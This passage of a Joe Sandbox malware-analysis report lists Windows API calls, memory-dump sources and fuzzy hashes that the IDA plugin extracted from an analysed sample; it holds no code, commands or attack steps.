                                                                      • GetInputState.USER32 ref: 00C938CB
                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C93922
                                                                      • TranslateMessage.USER32(?), ref: 00C9394B
                                                                      • DispatchMessageW.USER32(?), ref: 00C93955
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C93966
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      • Opcode ID: ab40de2c3a6090db0d6602c00e178db672a361a6a78d7fc7acdd916a4ab448dc
                                                                      • Instruction ID: 8577350ef7c361c7d814541fe9dc876dafab58491d0d1d0c1c820e59ae937fd9
                                                                      • Opcode Fuzzy Hash: ab40de2c3a6090db0d6602c00e178db672a361a6a78d7fc7acdd916a4ab448dc
                                                                      • Instruction Fuzzy Hash: C231A6705043C1DEEF35CB35984CBBA37A8AB15314F09056DE876D61E0E7B49B89CB12
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00C81915
                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C819C1
                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00C819C9
                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C819DA
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C819E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      • Opcode ID: 24ad7681d6d28e5a518b5a1aa97d9b77bc3f38d12625533356681e7e4bf75236
                                                                      • Instruction ID: de934a41853c575cfbf6008a010772be3037958bbea362d57ffe7479242bf160
                                                                      • Opcode Fuzzy Hash: 24ad7681d6d28e5a518b5a1aa97d9b77bc3f38d12625533356681e7e4bf75236
                                                                      • Instruction Fuzzy Hash: 2231AF71900219EFCB00DFA8C999BEE3BB9EB04319F144225FD61A72D1C7709A55CB90
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CF38
                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00C9CF6F
                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CFB4
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CFC8
                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C9C21E,00000000), ref: 00C9CFF2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                      • String ID:
                                                                      • API String ID: 3191363074-0
                                                                      • Opcode ID: d45a6135dd5318e14445b143b18e2a89c6afb96ba056b16bf944b8a37eb97d91
                                                                      • Instruction ID: d981a4ed833a411e63613fcaef027b6d30dc8d11ff99f16fbacfc34443f09247
                                                                      • Opcode Fuzzy Hash: d45a6135dd5318e14445b143b18e2a89c6afb96ba056b16bf944b8a37eb97d91
                                                                      • Instruction Fuzzy Hash: 5B312971A04605AFDF20DFE5C9C8AAFBBF9EB14355F10442EF516E2151EB30AE419B60
                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00C5CDC6
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C5CDE9
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C5CE0F
                                                                      • _free.LIBCMT ref: 00C5CE22
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C5CE31
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: 86e3c37363521e5b11a341ed05abdc6f805c05f630c736e7a14e43cb629d9288
                                                                      • Instruction ID: a1eaf97c756b08e9f063084f6969a596fd3b4dabe1391eb5e7688ae939a25b5d
                                                                      • Opcode Fuzzy Hash: 86e3c37363521e5b11a341ed05abdc6f805c05f630c736e7a14e43cb629d9288
                                                                      • Instruction Fuzzy Hash: F701477A6013113F232116BA6CCEE7F7A6CDEC2BA23140229FD11D3200EAA08E4591B8
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C39693
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C396A2
                                                                      • BeginPath.GDI32(?), ref: 00C396B9
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C396E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 01d79d2d89401c2bd767414774377aa2c63c6438f491ab09274717003f241725
                                                                      • Instruction ID: 80b4ae2ee391a818f498802a5a2857f0966baa072bc58bda4f513b4c0a75a7f6
                                                                      • Opcode Fuzzy Hash: 01d79d2d89401c2bd767414774377aa2c63c6438f491ab09274717003f241725
                                                                      • Instruction Fuzzy Hash: 7E216A30812205EBDB119F29EC597BD3BB8FB10325F184216F820A61B0D3F09A91CFD1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: e51b6eee96deb609b295629cd9b944d3373404a860da93e7abb859755e491bc1
                                                                      • Instruction ID: 8bb9640f6008dfafbca6b85944314ccd121ca11750a7040626992fd0c23ad42d
                                                                      • Opcode Fuzzy Hash: e51b6eee96deb609b295629cd9b944d3373404a860da93e7abb859755e491bc1
                                                                      • Instruction Fuzzy Hash: C701B5A5661609BBE2186511DD82FFB735CAB21398F448034FD149B241F7A0EE9193A8
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,?,00C4F2DE,00C53863,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6), ref: 00C52DFD
                                                                      • _free.LIBCMT ref: 00C52E32
                                                                      • _free.LIBCMT ref: 00C52E59
                                                                      • SetLastError.KERNEL32(00000000,00C21129), ref: 00C52E66
                                                                      • SetLastError.KERNEL32(00000000,00C21129), ref: 00C52E6F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: ddaa5e3e4a6d9bad15b1dc40b256b5b972320c69034cdd9f8463e92063c4407a
                                                                      • Instruction ID: f24b54db4efb4e0cc52687e385d848b0c1aab3b7f500771d7792f09c10d51a7e
                                                                      • Opcode Fuzzy Hash: ddaa5e3e4a6d9bad15b1dc40b256b5b972320c69034cdd9f8463e92063c4407a
                                                                      • Instruction Fuzzy Hash: 6A01FE3E10550067C61227756C87F6F16D99BD33A7F244129FC31A2293DFA49DCD5128
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?,?,00C8035E), ref: 00C8002B
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?), ref: 00C80046
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?), ref: 00C80054
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?), ref: 00C80064
                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C7FF41,80070057,?,?), ref: 00C80070
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: 1e9447ea1817f109f5c86e7bde08b8ce4b2f814d7d975e9b1ca87d048f1c0d09
                                                                      • Instruction ID: 7d8332a6af61c0c82c3134e204095ce6ca8c1b8de23f9561fff56f4de46a8ae7
                                                                      • Opcode Fuzzy Hash: 1e9447ea1817f109f5c86e7bde08b8ce4b2f814d7d975e9b1ca87d048f1c0d09
                                                                      • Instruction Fuzzy Hash: 1601DB72600204BFDB506F68DC88BAE7BEDEF44396F244224F805D2210E776CE449BA0
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C8E997
                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00C8E9A5
                                                                      • Sleep.KERNEL32(00000000), ref: 00C8E9AD
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00C8E9B7
                                                                      • Sleep.KERNEL32 ref: 00C8E9F3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: 636e757794cfeaf8f44bf716827dfab26f3d2c41321166d4c4643ac45ea105d7
                                                                      • Instruction ID: 8aebc772cc028b41bdb66911ece180ede6dd95224caefbf24a29ebb0f28d84e6
                                                                      • Opcode Fuzzy Hash: 636e757794cfeaf8f44bf716827dfab26f3d2c41321166d4c4643ac45ea105d7
                                                                      • Instruction Fuzzy Hash: 70016931C01629DBCF00AFE9DC89BEDBB78FF08305F000656E952B2250CB709651CBA5
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C8102A
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C81036
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81045
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C8104C
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81062
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: 01ad53a931b0eef192c954e8e6c1a5570afdc72da632ebe925ad2212d4b7a7ac
                                                                      • Instruction ID: 41d9bfcbcbb42c1fe285f4225cde11ca0ae5ff8f382ed207c7f0c0f1b8b3b751
                                                                      • Opcode Fuzzy Hash: 01ad53a931b0eef192c954e8e6c1a5570afdc72da632ebe925ad2212d4b7a7ac
                                                                      • Instruction Fuzzy Hash: 8BF04975200301ABDB216FA8EC89F5B3BADEF89761F140525FA45D6250CA70DD518A60
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C80FCA
                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C80FD6
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C80FE5
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C80FEC
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C81002
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: b83bebce97224d677c9b0a4a941627420811ce93ebe289e3ab92dc7485d66f4d
                                                                      • Instruction ID: b9857c1b89ebd7ffa35d2dea853aa375aa2625471c154ad9379295789c3b9cee
                                                                      • Opcode Fuzzy Hash: b83bebce97224d677c9b0a4a941627420811ce93ebe289e3ab92dc7485d66f4d
                                                                      • Instruction Fuzzy Hash: FFF04975200301AFDB216FA8AC89F5A3BADEF89762F144525FA45D6251CA70DC518A60
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90324
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90331
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C9033E
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C9034B
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90358
                                                                      • CloseHandle.KERNEL32(?,?,?,?,00C9017D,?,00C932FC,?,00000001,00C62592,?), ref: 00C90365
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: e639e0d65164dd435dd071801506fdbb70ccd9281283453a171a4c96dd6d0c65
                                                                      • Instruction ID: 9d9a029a0a73f742030d0c069d8e41445c799f0015b8f0fda99a440b208366d5
                                                                      • Opcode Fuzzy Hash: e639e0d65164dd435dd071801506fdbb70ccd9281283453a171a4c96dd6d0c65
                                                                      • Instruction Fuzzy Hash: 4F01AE72800B159FCB30AF66D880816FBF9BF603153258A3FD1A652931C3B1AA58DF80
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C5D752
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C5D764
                                                                      • _free.LIBCMT ref: 00C5D776
                                                                      • _free.LIBCMT ref: 00C5D788
                                                                      • _free.LIBCMT ref: 00C5D79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b1fd1881c668d293e30926661fc738ab50a48054fdd12b7051d8dc920a1b9ef9
                                                                      • Instruction ID: 472eb8eb85b3daf3c88c5f24c546d970b07b7a774f6fa2600a3cec82fcb018fc
                                                                      • Opcode Fuzzy Hash: b1fd1881c668d293e30926661fc738ab50a48054fdd12b7051d8dc920a1b9ef9
                                                                      • Instruction Fuzzy Hash: D5F06236500348AB8635EB64F9C2E5A7BDDBB093527A40805F869EB646C730FCC48668
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C85C58
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C85C6F
                                                                      • MessageBeep.USER32(00000000), ref: 00C85C87
                                                                      • KillTimer.USER32(?,0000040A), ref: 00C85CA3
                                                                      • EndDialog.USER32(?,00000001), ref: 00C85CBD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: 81451ff8501fb15d66fe3a44180c9e859300550bdea01e6097441f6124372be9
                                                                      • Instruction ID: 378738cdd5c124679f733f53a77ba13db381091ea2debcd477bd74601b7693f5
                                                                      • Opcode Fuzzy Hash: 81451ff8501fb15d66fe3a44180c9e859300550bdea01e6097441f6124372be9
                                                                      • Instruction Fuzzy Hash: B501A930540B14ABEB316B10DD8EFAA77B8BF04B05F001659B593A14E1DBF0AE84DF94
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 00C395D4
                                                                      • StrokeAndFillPath.GDI32(?,?,00C771F7,00000000,?,?,?), ref: 00C395F0
                                                                      • SelectObject.GDI32(?,00000000), ref: 00C39603
                                                                      • DeleteObject.GDI32 ref: 00C39616
                                                                      • StrokePath.GDI32(?), ref: 00C39631
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: 5aff354424f3d81019fbd99b098c32347a0eaa76bc3ba93d52a88806027d2414
                                                                      • Instruction ID: b2ae26f280753327c0760b03f8d42429fc2735982475f9f690f0949710afaf5b
                                                                      • Opcode Fuzzy Hash: 5aff354424f3d81019fbd99b098c32347a0eaa76bc3ba93d52a88806027d2414
                                                                      • Instruction Fuzzy Hash: D3F03C30006204EBDB126F69ED5C7BD3B75EB10322F088314F866550F0C7B08A91DFA2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                       • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
